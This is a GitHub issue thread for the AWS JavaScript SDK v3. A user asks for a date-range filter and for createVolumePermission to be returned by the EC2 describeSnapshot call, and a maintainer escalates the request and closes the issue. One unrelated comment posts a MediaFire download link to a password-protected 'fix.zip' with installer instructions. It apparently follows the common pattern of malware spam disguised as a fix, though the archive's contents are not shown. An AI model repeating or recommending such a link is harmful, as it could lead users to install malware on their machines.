### ISSUE TITLE
Batch request for describeSnapshotAttribute

### ISSUE THREAD

**Issue by alphadev4** [aws/aws-sdk-js-v3#6417]
### Describe the feature

I'd like to request two enhancements in the ec2 client.

1. The describeSnapshot call should have a range parameter which should allow to list the snapshots within the specified dates. lets say from past 1 month.
2. We should have the createVolumePermission returned within the  describeSnapshot

### Use Case

- I need to fetch the  snapshots and im using this call . I have like a lot of snapshots and i only want to fetch the snapshots from the last 1 month. And i simply cannot because there is no range filter. The attribute we currently have as **start-time** needs to have the exact time stamp it was initiated.
- And this issue eventually arises the second issue for me which is describeSnapshotAttributes, as this call would just allow me to make one call at a time and it takes a lot of time for me to make this call for each snapshot. and i only need **createVolumePermission**  attribute from this call. The workaround for this would be to actually have the createVolumePermission attribute present in the describeSnapshot call as well.

### Proposed Solution

Solution 1: Add the range filter in describeSnapshot call
Solution 2: Add the createVolumePermission attribute in describeSnapshot itself instead of the describeSnapshotAttributes

### Acknowledgements

- [ ] I may be able to implement this feature request
- [ ] This feature might incur a breaking change

### SDK version used

v3

### Environment details (OS name and version, etc.)

mac

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aBurmeseDev** [comment]
Hi @alphadev4 - thanks for reaching out. 

The changes you're requesting have to be made in service side EC2 and SDK team does not have direct control over the service models or the ability to make the requested changes. However, we've escalated your request to the EC2 team on your behalf (Reference: P152746014).

Since there's no pending action item for SDK team, I'm going to close this. Please feel free to reach out to service team directly via [AWS Support](https://aws.amazon.com/contact-us/).
